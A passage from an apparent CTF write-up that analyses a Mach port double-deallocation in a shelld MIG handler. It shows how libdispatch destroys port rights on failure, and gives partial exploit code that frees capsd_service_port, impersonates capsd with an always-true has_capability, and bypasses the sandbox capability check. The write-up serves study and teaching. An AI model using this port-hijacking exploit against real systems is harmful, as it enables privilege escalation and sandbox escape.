class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span 
class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span 
class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="type">mach_msg_return_t</span></span></span><br><span class="line"><span class="function"><span class="title">dispatch_mig_server</span><span class="params">(<span class="type">dispatch_source_t</span> ds, <span class="type">size_t</span> maxmsgsz,</span></span></span><br><span class="line"><span class="params"><span class="function">        <span class="type">dispatch_mig_callback_t</span> callback)</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">    [...]</span><br><span class="line">    <span class="type">uint32_t</span> cnt = <span class="number">1000</span>; <span class="comment">// do not stall out serial queues</span></span><br><span class="line">    <span class="type">boolean_t</span> demux_success;</span><br><span class="line">    <span class="type">bool</span> received = <span class="literal">false</span>;</span><br><span class="line">    [...]</span><br><span class="line"></span><br><span class="line">    tmp_options = options;</span><br><span class="line">    <span class="comment">// XXX FIXME -- change this to not starve out the target queue</span></span><br><span class="line">    <span 
class="comment">// Loop at most cnt times, reading messages from the port's queue</span></span><br><span class="line">    <span class="keyword">for</span> (;;) &#123;</span><br><span class="line">        <span class="comment">// If the loop has run cnt times, or the source's queue is suspended</span></span><br><span class="line">        <span class="keyword">if</span> (<span class="built_in">DISPATCH_QUEUE_IS_SUSPENDED</span>(ds) || (--cnt == <span class="number">0</span>)) &#123;</span><br><span class="line">            <span class="comment">// then stop receiving mach messages for the rest of this call</span></span><br><span class="line">            options &amp;= ~MACH_RCV_MSG;</span><br><span class="line">            tmp_options &amp;= ~MACH_RCV_MSG;</span><br><span class="line">            <span class="comment">// If there is nothing to send either (this iteration would only have received), return directly</span></span><br><span class="line">            <span class="keyword">if</span> (!(tmp_options &amp; MACH_SEND_MSG)) &#123;</span><br><span class="line">                <span class="keyword">goto</span> out;</span><br><span class="line">            &#125;</span><br><span class="line">        &#125;</span><br><span class="line">        <span class="comment">// mach_msg may receive and/or send here: RCV on the first iteration, SEND+RCV on later iterations that have a reply to send, and SEND only on the final one once RCV has been cleared.</span></span><br><span class="line">        kr = <span class="built_in">mach_msg</span>(&amp;bufReply-&gt;Head, tmp_options, bufReply-&gt;Head.msgh_size,</span><br><span class="line">                (<span class="type">mach_msg_size_t</span>)rcv_size, (<span class="type">mach_port_t</span>)dr-&gt;du_ident, <span class="number">0</span>, <span class="number">0</span>);</span><br><span class="line">        <span class="comment">// Reset the temporary options</span></span><br><span class="line">        tmp_options = options;</span><br><span class="line">        <span class="comment">// mach_msg error handling; not relevant here</span></span><br><span class="line">        <span class="keyword">if</span> (<span class="built_in">unlikely</span>(kr)) &#123;</span><br><span class="line">            [...]</span><br><span class="line">         
   <span class="keyword">goto</span> out;</span><br><span class="line">        &#125;</span><br><span class="line">        <span class="comment">// If no further receive is needed, return directly</span></span><br><span class="line">        <span class="keyword">if</span> (!(tmp_options &amp; MACH_RCV_MSG)) &#123;</span><br><span class="line">            <span class="keyword">goto</span> out;</span><br><span class="line">        &#125;</span><br><span class="line"></span><br><span class="line">        [...]</span><br><span class="line">        <span class="comment">// Reaching this point means this iteration received a mach message (whether a reply was also sent in the same call does not matter here)</span></span><br><span class="line">        received = <span class="literal">true</span>;</span><br><span class="line"></span><br><span class="line">        <span class="comment">// Swap bufRequest and bufReply</span></span><br><span class="line">        bufTemp = bufRequest;</span><br><span class="line">        bufRequest = bufReply;</span><br><span class="line">        bufReply = bufTemp;</span><br><span class="line">        <span class="comment">// The received mach msg is now in bufRequest</span></span><br><span class="line"></span><br><span class="line">        [...]</span><br><span class="line">        </span><br><span class="line">        _voucher_replace(<span class="built_in">voucher_create_with_mach_msg</span>(&amp;bufRequest-&gt;Head));</span><br><span class="line">        bufReply-&gt;Head = (<span class="type">mach_msg_header_t</span>)&#123; &#125;;</span><br><span class="line">        <span class="comment">// Hand the received message to callback, the MIG handler routine that the caller supplied to dispatch_mig_server</span></span><br><span class="line">        <span class="comment">// In shelld, this callback is shelld_server</span></span><br><span class="line">        demux_success = <span class="built_in">callback</span>(&amp;bufRequest-&gt;Head, &amp;bufReply-&gt;Head);</span><br><span class="line"></span><br><span class="line">        <span class="comment">// The incoming MIG message has a bad msgh_id, so callback 
failed</span></span><br><span class="line">        <span class="keyword">if</span> (!demux_success) &#123;</span><br><span class="line">            <span class="comment">// destroy the request - but not the reply port</span></span><br><span class="line">            bufRequest-&gt;Head.msgh_remote_port = <span class="number">0</span>;</span><br><span class="line">            <span class="built_in">mach_msg_destroy</span>(&amp;bufRequest-&gt;Head);</span><br><span class="line">        <span class="comment">// callback succeeded and the reply message is not a complex message</span></span><br><span class="line">        &#125; <span class="keyword">else</span> <span class="keyword">if</span> (!(bufReply-&gt;Head.msgh_bits &amp; MACH_MSGH_BITS_COMPLEX)) &#123;</span><br><span class="line">            <span class="comment">// if MACH_MSGH_BITS_COMPLEX is _not_ set, then bufReply-&gt;RetCode</span></span><br><span class="line">            <span class="comment">// is present</span></span><br><span class="line">            <span class="comment">// If the server's interface failed, i.e. it returned something other than KERN_SUCCESS</span></span><br><span class="line">            <span class="keyword">if</span> (<span class="built_in">unlikely</span>(bufReply-&gt;RetCode)) &#123;</span><br><span class="line">                [...]</span><br><span class="line"></span><br><span class="line">                <span class="comment">// destroy the request - but not the reply port</span></span><br><span class="line">                bufRequest-&gt;Head.msgh_remote_port = <span class="number">0</span>;</span><br><span class="line">                <span class="comment">// The incoming mach message is destroyed here</span></span><br><span class="line">                <span class="built_in">mach_msg_destroy</span>(&amp;bufRequest-&gt;Head);</span><br><span class="line">            &#125;</span><br><span class="line">        &#125;</span><br><span class="line">        <span class="comment">// If a reply is needed, set the SEND flag; the loop then jumps back to the top and runs mach_msg(RCV|SEND)</span></span><br><span class="line">        
<span class="keyword">if</span> (bufReply-&gt;Head.msgh_remote_port) &#123;</span><br><span class="line">            tmp_options |= MACH_SEND_MSG;</span><br><span class="line">            <span class="keyword">if</span> (<span class="built_in">MACH_MSGH_BITS_REMOTE</span>(bufReply-&gt;Head.msgh_bits) !=</span><br><span class="line">                    MACH_MSG_TYPE_MOVE_SEND_ONCE) &#123;</span><br><span class="line">                tmp_options |= MACH_SEND_TIMEOUT;</span><br><span class="line">            &#125;</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line">    [...]</span><br><span class="line"></span><br><span class="line">    <span class="keyword">return</span> kr;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>Note this fragment:</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// In shelld, this callback is shelld_server</span></span><br><span class="line">demux_success = <span class="built_in">callback</span>(&amp;bufRequest-&gt;Head, &amp;bufReply-&gt;Head);</span><br><span class="line"></span><br><span class="line"><span class="comment">// The incoming MIG message has a bad msgh_id, so callback failed</span></span><br><span class="line"><span class="keyword">if</span> 
(!demux_success) &#123;</span><br><span class="line">    [...]</span><br><span class="line"><span class="comment">// callback succeeded and the reply message is not a complex message</span></span><br><span class="line">&#125; <span class="keyword">else</span> <span class="keyword">if</span> (!(bufReply-&gt;Head.msgh_bits &amp; MACH_MSGH_BITS_COMPLEX)) &#123;</span><br><span class="line">    <span class="comment">// if MACH_MSGH_BITS_COMPLEX is _not_ set, then bufReply-&gt;RetCode</span></span><br><span class="line">    <span class="comment">// is present</span></span><br><span class="line">    <span class="comment">// If the server's interface failed, i.e. it returned something other than KERN_SUCCESS</span></span><br><span class="line">    <span class="keyword">if</span> (<span class="built_in">unlikely</span>(bufReply-&gt;RetCode)) &#123;</span><br><span class="line">        [...]</span><br><span class="line"></span><br><span class="line">        <span class="comment">// destroy the request - but not the reply port</span></span><br><span class="line">        bufRequest-&gt;Head.msgh_remote_port = <span class="number">0</span>;</span><br><span class="line">        <span class="comment">// The incoming mach message is destroyed here</span></span><br><span class="line">        <span class="built_in">mach_msg_destroy</span>(&amp;bufRequest-&gt;Head);</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>Here, callback is the <code>shelld_server</code> that shelld registered earlier, which will <strong>almost never return FALSE</strong>, and the <strong>reply mach message is not COMPLEX</strong>. The first if condition is therefore false, and execution enters the second (else if) branch.</p><p>In this branch, dispatch_mig_server checks the call result RetCode: <strong>if the call failed, it calls mach_msg_destroy to destroy the request message</strong>.</p><p>In the XNU implementation of <code>mach_msg_destroy</code>, note that it destroys every <code>MACH_MSG_PORT_DESCRIPTOR</code> in the mach msg passed to it, and here that descriptor <strong>holds the listener mach port the client sent earlier</strong>:</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span 
class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="type">void</span></span></span><br><span class="line"><span class="function"><span class="title">mach_msg_destroy</span><span class="params">(<span class="type">mach_msg_header_t</span> *msg)</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">    <span class="type">mach_msg_bits_t</span> mbits = msg-&gt;msgh_bits;</span><br><span class="line"></span><br><span class="line">    <span class="comment">/*</span></span><br><span class="line"><span class="comment">     * The msgh_local_port field doesn&#x27;t hold a port right.</span></span><br><span class="line"><span class="comment">  
   * The receive operation consumes the destination port right.</span></span><br><span class="line"><span class="comment">     */</span></span><br><span class="line"></span><br><span class="line">    <span class="built_in">mach_msg_destroy_port</span>(msg-&gt;msgh_remote_port, <span class="built_in">MACH_MSGH_BITS_REMOTE</span>(mbits));</span><br><span class="line">    <span class="built_in">mach_msg_destroy_port</span>(msg-&gt;msgh_voucher_port, <span class="built_in">MACH_MSGH_BITS_VOUCHER</span>(mbits));</span><br><span class="line"></span><br><span class="line">    <span class="keyword">if</span> (mbits &amp; MACH_MSGH_BITS_COMPLEX) &#123;</span><br><span class="line">        <span class="type">mach_msg_base_t</span>         *base;</span><br><span class="line">        <span class="type">mach_msg_type_number_t</span>  count, i;</span><br><span class="line">        <span class="type">mach_msg_descriptor_t</span>   *daddr;</span><br><span class="line"></span><br><span class="line">        base = (<span class="type">mach_msg_base_t</span> *) msg;</span><br><span class="line">        count = base-&gt;body.msgh_descriptor_count;</span><br><span class="line"></span><br><span class="line">        daddr = (<span class="type">mach_msg_descriptor_t</span> *) (base + <span class="number">1</span>);</span><br><span class="line">        <span class="keyword">for</span> (i = <span class="number">0</span>; i &lt; count; i++) &#123;</span><br><span class="line">            <span class="keyword">switch</span> (daddr-&gt;type.type) &#123;</span><br><span class="line">                <span class="keyword">case</span> MACH_MSG_PORT_DESCRIPTOR: &#123;</span><br><span class="line">                    <span class="comment">// If a descriptor in the incoming mach msg is of type PORT, call mach_msg_destroy_port to release it</span></span><br><span class="line">                    <span class="type">mach_msg_port_descriptor_t</span> *dsc;</span><br><span class="line"></span><br><span class="line">                    
<span class="comment">/* </span></span><br><span class="line"><span class="comment">                     * Destroy port rights carried in the message </span></span><br><span class="line"><span class="comment">                     */</span></span><br><span class="line">                    dsc = &amp;daddr-&gt;port;</span><br><span class="line">                    <span class="comment">// mach_msg_destroy_port in turn calls mach_port_deallocate to release the port</span></span><br><span class="line">                    <span class="built_in">mach_msg_destroy_port</span>(dsc-&gt;name, dsc-&gt;disposition);</span><br><span class="line">                    daddr = (<span class="type">mach_msg_descriptor_t</span> *)(dsc + <span class="number">1</span>);</span><br><span class="line">                    <span class="keyword">break</span>;</span><br><span class="line">                &#125;</span><br><span class="line">                [...]</span><br><span class="line">            &#125;</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>This means: <strong>if the interface implemented by the server does not return KERN_SUCCESS, libdispatch automatically releases the <code>listener</code> (mach port) that the client passed to the server.</strong></p><p>In other words: <strong>if a MIG call returns a success code, the method has taken ownership of every mach port right contained in the message; if it returns a failure code, the method owns none of the mach port rights contained in the message</strong>, and those rights are then silently destroyed by MIG.</p><h5 id="4-mach-msg-server">4) mach_msg_server*</h5><p>Besides libdispatch, the other functions used for MIG, <code>mach_msg_server</code> and <code>mach_msg_server_once</code>, follow the same rule:</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span 
class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="type">mach_msg_return_t</span></span></span><br><span class="line"><span class="function"><span class="title">mach_msg_server</span><span class="params">(</span></span></span><br><span class="line"><span class="params"><span class="function">    <span class="type">boolean_t</span> (*demux)(<span class="type">mach_msg_header_t</span> *, <span class="type">mach_msg_header_t</span> 
*),</span></span></span><br><span class="line"><span class="params"><span class="function">    <span class="type">mach_msg_size_t</span> max_size,</span></span></span><br><span class="line"><span class="params"><span class="function">    <span class="type">mach_port_t</span> rcv_name,</span></span></span><br><span class="line"><span class="params"><span class="function">    <span class="type">mach_msg_options_t</span> options)</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">    [...]</span><br><span class="line"></span><br><span class="line">    <span class="keyword">for</span> (;;) &#123;</span><br><span class="line">        [...]</span><br><span class="line"></span><br><span class="line">        <span class="comment">// Receive the incoming message</span></span><br><span class="line">        mr = <span class="built_in">mach_msg</span>(&amp;bufRequest-&gt;Head, MACH_RCV_MSG|MACH_RCV_VOUCHER|options,</span><br><span class="line">                  <span class="number">0</span>, request_size, rcv_name,</span><br><span class="line">                  MACH_MSG_TIMEOUT_NONE, MACH_PORT_NULL);</span><br><span class="line"></span><br><span class="line">        <span class="keyword">while</span> (mr == MACH_MSG_SUCCESS) &#123;</span><br><span class="line">            <span class="comment">/* we have another request message */</span></span><br><span class="line"></span><br><span class="line">            buffers_swapped = FALSE;</span><br><span class="line">            old_state = <span class="built_in">voucher_mach_msg_adopt</span>(&amp;bufRequest-&gt;Head);</span><br><span class="line"></span><br><span class="line">            <span class="comment">// Call the MIG server </span></span><br><span class="line">            (<span class="type">void</span>) (*demux)(&amp;bufRequest-&gt;Head, &amp;bufReply-&gt;Head);</span><br><span class="line">            </span><br><span class="line">            <span class="comment">// If the reply mach msg is not 
COMPLEX</span></span><br><span class="line">            <span class="keyword">if</span> (!(bufReply-&gt;Head.msgh_bits &amp; MACH_MSGH_BITS_COMPLEX)) &#123;</span><br><span class="line">                <span class="keyword">if</span> (bufReply-&gt;RetCode == MIG_NO_REPLY)</span><br><span class="line">                    bufReply-&gt;Head.msgh_remote_port = MACH_PORT_NULL;</span><br><span class="line">                <span class="comment">// and the MIG call reported an error, and the message from the client is COMPLEX</span></span><br><span class="line">                <span class="keyword">else</span> <span class="keyword">if</span> ((bufReply-&gt;RetCode != KERN_SUCCESS) &amp;&amp;</span><br><span class="line">                     (bufRequest-&gt;Head.msgh_bits &amp; MACH_MSGH_BITS_COMPLEX)) &#123;</span><br><span class="line">                    <span class="comment">/* destroy the request - but not the reply port */</span></span><br><span class="line">                    bufRequest-&gt;Head.msgh_remote_port = MACH_PORT_NULL;</span><br><span class="line">                    <span class="comment">// Call mach_msg_destroy to destroy the request</span></span><br><span class="line">                    <span class="built_in">mach_msg_destroy</span>(&amp;bufRequest-&gt;Head);</span><br><span class="line">                &#125;</span><br><span class="line">            &#125;</span><br><span class="line"></span><br><span class="line">            [...]</span><br><span class="line"></span><br><span class="line">        &#125; <span class="comment">/* while (mr == MACH_MSG_SUCCESS) */</span></span><br><span class="line"></span><br><span class="line">        [...]</span><br><span class="line"></span><br><span class="line">        <span class="keyword">break</span>;</span><br><span class="line"></span><br><span class="line">    &#125; <span class="comment">/* for(;;) */</span></span><br><span class="line"></span><br><span class="line">    (<span class="type">void</span>)<span 
class="built_in">vm_deallocate</span>(self,</span><br><span class="line">                (<span class="type">vm_address_t</span>) bufRequest,</span><br><span class="line">                request_alloc);</span><br><span class="line">    (<span class="type">void</span>)<span class="built_in">vm_deallocate</span>(self,</span><br><span class="line">                (<span class="type">vm_address_t</span>) bufReply,</span><br><span class="line">                reply_alloc);</span><br><span class="line">    <span class="keyword">return</span> mr;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><h4 id="c-存在的问题">c. The problem</h4><p>Now let's go back to <code>register_completion_listener</code> and see what is wrong:</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="type">kern_return_t</span> <span class="title">register_completion_listener</span><span class="params">(<span class="type">mach_port_t</span> server, <span class="type">const</span> <span class="type">char</span>* session_name, <span class="type">mach_port_t</span> listener, <span class="type">audit_token_t</span> client)</span> </span>&#123;</span><br><span class="line">    CFMutableDictionaryRef session = <span class="built_in">lookup_session</span>(session_name, client);</span><br><span class="line">    <span class="keyword">if</span> (!session) &#123;</span><br><span class="line">        <span class="built_in">mach_port_deallocate</span>(<span class="built_in">mach_task_self</span>(), 
listener);</span><br><span class="line">        <span class="keyword">return</span> KERN_FAILURE;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    CFNumberRef value = <span class="built_in">CFNumberCreate</span>(kCFAllocatorDefault, kCFNumberSInt32Type, &amp;listener);</span><br><span class="line">    <span class="built_in">CFDictionaryAddValue</span>(session, <span class="built_in">CFSTR</span>(<span class="string">&quot;listener&quot;</span>), value);</span><br><span class="line">    <span class="built_in">CFRelease</span>(value);</span><br><span class="line"></span><br><span class="line">    <span class="keyword">return</span> KERN_SUCCESS;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>Clearly, since this function returns <code>KERN_FAILURE</code> when the session cannot be found, it <strong>should not deallocate the listener mach port itself</strong>. Doing so means <strong>the mach port is deallocated twice</strong>: once inside this function, and once more in the MIG error path, where <code>mach_msg_destroy</code> destroys the request message after a failed call.</p><h4 id="d-接管-capsd-service-port">d. 
Taking over capsd_service_port</h4><p>From the above we know that the <code>register_completion_listener</code> function can cause a double deallocation of a mach port.</p><p>Because <strong>mach port rights are reference counted</strong>, we can pass <code>capsd_service_port</code> to this function and use the bug to release <code>capsd_service_port</code> twice. At that moment the reference count of capsd_service_port is 2, so the double release drops it to 0 and the mach port name is freed completely in the current task. The name can then be reused by the next mach port that is created.</p><blockquote><p>In shelld, the reference count of capsd_service_port is 2 <strong>while <code>register_completion_listener(..., capsd_service_port)</code> executes</strong>, for these reasons:</p><ol><li>shelld calls <code>bootstrap_look_up</code> in its main function, which already acquired one right to capsd_service_port</li><li>When register_completion_listener is invoked, the client sends capsd_service_port to the server once more</li></ol><p>So the server holds the same port in two different places, and the reference count is 2.</p></blockquote><p>Therefore we can <strong>try to hijack / take over the freed mach port name</strong>, impersonate “capsd” to shelld, return a forged result when shelld queries a capability, and bypass the sandbox capability check.</p><p>After spending some time on the exploit, the following code successfully gets past shelld's sandbox capabilities check:</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span 
class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;bootstrap.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;stdlib.h&gt;</span></span></span><br><span class="line"></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&quot;../mig/shelld.h&quot;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span 
class="string">&quot;../common/utils.h&quot;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&quot;../common/decls.h&quot;</span></span></span><br><span class="line"></span><br><span class="line"><span class="comment">// 伪造 capsd 必备函数</span></span><br><span class="line"><span class="function"><span class="type">boolean_t</span> <span class="title">capsd_server</span></span></span><br><span class="line"><span class="function">    <span class="params">(<span class="type">mach_msg_header_t</span> *InHeadP, <span class="type">mach_msg_header_t</span> *OutHeadP)</span></span>;</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="type">kern_return_t</span> <span class="title">grant_capability</span><span class="params">(<span class="type">mach_port_t</span> server, <span class="type">audit_token_t</span> token, <span class="type">pid_t</span> target, <span class="type">const</span> <span class="type">char</span>* op, <span class="type">const</span> <span class="type">char</span>* arg)</span> </span>&#123;</span><br><span class="line">    <span class="keyword">return</span> KERN_SUCCESS;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="type">kern_return_t</span> <span class="title">has_capability</span><span class="params">(<span class="type">mach_port_t</span> server, <span class="type">pid_t</span> pid, <span class="type">const</span> <span class="type">char</span>* op, <span class="type">const</span> <span class="type">char</span>* arg, <span class="type">int</span>* out)</span> </span>&#123;</span><br><span class="line">    *out = <span class="number">1</span>;</span><br><span class="line">    <span class="keyword">return</span> KERN_SUCCESS;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="function"><span 
class="type">int</span> <span class="title">main</span><span class="params">(<span class="type">int</span> argc, <span class="type">char</span>* argv[])</span> </span>&#123;</span><br><span class="line">    <span class="comment">// Get the bootstrap port, the shelld port and the capsd port</span></span><br><span class="line">    <span class="type">mach_port_t</span> bp, sp, cp;</span><br><span class="line">    <span class="built_in">task_get_special_port</span>(<span class="built_in">mach_task_self</span>(), TASK_BOOTSTRAP_PORT, &amp;bp);</span><br><span class="line">    <span class="type">kern_return_t</span> kr = <span class="built_in">bootstrap_look_up</span>(bp, <span class="string">&quot;net.saelo.shelld&quot;</span>, &amp;sp);</span><br><span class="line">    <span class="built_in">ASSERT_SUCCESS</span>(kr, <span class="string">&quot;shelld bootstrap_look_up&quot;</span>);</span><br><span class="line">    kr = <span class="built_in">bootstrap_look_up</span>(bp, <span class="string">&quot;net.saelo.capsd&quot;</span>, &amp;cp);</span><br><span class="line">    <span class="built_in">ASSERT_SUCCESS</span>(kr, <span class="string">&quot;capsd bootstrap_look_up&quot;</span>);</span><br><span class="line"></span><br><span class="line">    <span class="comment">// Prepare a usable session in advance</span></span><br><span class="line">    <span class="built_in">shelld_create_session</span>(sp, <span class="string">&quot;session&quot;</span>);</span><br><span class="line"></span><br><span class="line">    <span class="comment">// Quick sanity test: this must fail the capability check, because the exp has no right to launch /bin/bash</span></span><br><span class="line">    kr = <span class="built_in">shell_exec</span>(sp, <span class="string">&quot;session&quot;</span>, <span class="string">&quot;echo &#x27;Hello World&#x27;&quot;</span>);</span><br><span class="line">    <span class="keyword">if</span>(kr != KERN_SUCCESS)</span><br><span class="line">        <span class="built_in">printf</span>(<span class="string">&quot;[*] shell_exec failed 
before attack.\n&quot;</span>);</span><br><span class="line"></span><br><span class="line">    <span class="comment">// Try to release capsd_service_port inside shelld</span></span><br><span class="line">    <span class="built_in">register_completion_listener</span>(sp, <span class="string">&quot;non-exist-session&quot;</span>, cp);</span><br><span class="line"></span><br><span class="line">    <span class="comment">// Create a new pair: listener and listener_send_right</span></span><br><span class="line">    <span class="type">mach_port_t</span> listener, listener_send_right;</span><br><span class="line">    <span class="type">mach_msg_type_name_t</span> acquired_right;</span><br><span class="line">    <span class="built_in">mach_port_allocate</span>(<span class="built_in">mach_task_self</span>(), MACH_PORT_RIGHT_RECEIVE, &amp;listener);</span><br><span class="line">    <span class="built_in">mach_port_extract_right</span>(<span class="built_in">mach_task_self</span>(), listener, MACH_MSG_TYPE_MAKE_SEND, &amp;listener_send_right, &amp;acquired_right);</span><br><span class="line"></span><br><span class="line">    <span class="comment">/* Start a fake capsd_server.</span></span><br><span class="line"><span class="comment">       Note that the listener needs its own, newly created dispatch queue here,</span></span><br><span class="line"><span class="comment">       because the main queue only runs after dispatch_main is called, and we still need the control flow, so dispatch_main cannot be called */</span></span><br><span class="line">    <span class="type">dispatch_queue_t</span> replyQueue = <span class="built_in">dispatch_queue_create</span>(<span class="string">&quot;replyQueue&quot;</span>, <span class="literal">NULL</span>);</span><br><span class="line">    <span class="type">dispatch_source_t</span> source = <span 